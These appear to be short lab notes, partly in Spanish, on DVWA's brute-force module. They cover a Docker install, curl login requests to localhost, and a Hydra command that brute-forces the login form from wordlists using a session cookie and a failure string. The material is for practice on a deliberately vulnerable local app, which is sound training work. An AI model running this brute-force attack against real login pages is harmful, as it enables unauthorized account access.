#Instalacion dvwa

sudo docker pull vulnerables/web-dvwa
sudo docker run --rm -it -p 80:80 vulnerables/web-dvwa

# Comandos CURL

curl curl 'http://localhost/vulnerabilities/brute/?username=pablo&password=letmein&Login=Login' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Accept-Language: es-419,es;q=0.9' \
  -H 'Cookie: PHPSESSID=2qgdetnuuvg599f8vkpi6brl37; security=low' \
  -H 'Proxy-Connection: keep-alive' \
  -H 'Referer: http://localhost/vulnerabilities/brute/?username=admin&password=password&Login=Login' \
  -H 'Sec-Fetch-Dest: document' \
  -H 'Sec-Fetch-Mode: navigate' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-User: ?1' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36' \
  -H 'sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Linux"' \
  --compressed

curl curl 'http://localhost/vulnerabilities/brute/?username=esteban_paredes&password=colocolo91&Login=Login' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Accept-Language: es-419,es;q=0.9' \
  -H 'Cookie: PHPSESSID=2qgdetnuuvg599f8vkpi6brl37; security=low' \
  -H 'Proxy-Connection: keep-alive' \
  -H 'Referer: http://localhost/vulnerabilities/brute/?username=pablo&password=letmein&Login=Login' \
  -H 'Sec-Fetch-Dest: document' \
  -H 'Sec-Fetch-Mode: navigate' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'Sec-Fetch-User: ?1' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36' \
  -H 'sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Linux"' \
  --compressed

# Comando Hydra

sudo hydra -L usuarios.txt -P claves.txt "http-get-form://127.0.0.1:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=2qgdetnuuvg599f8vkpi6brl37; security=low;:F=Username and/or password incorrect." -I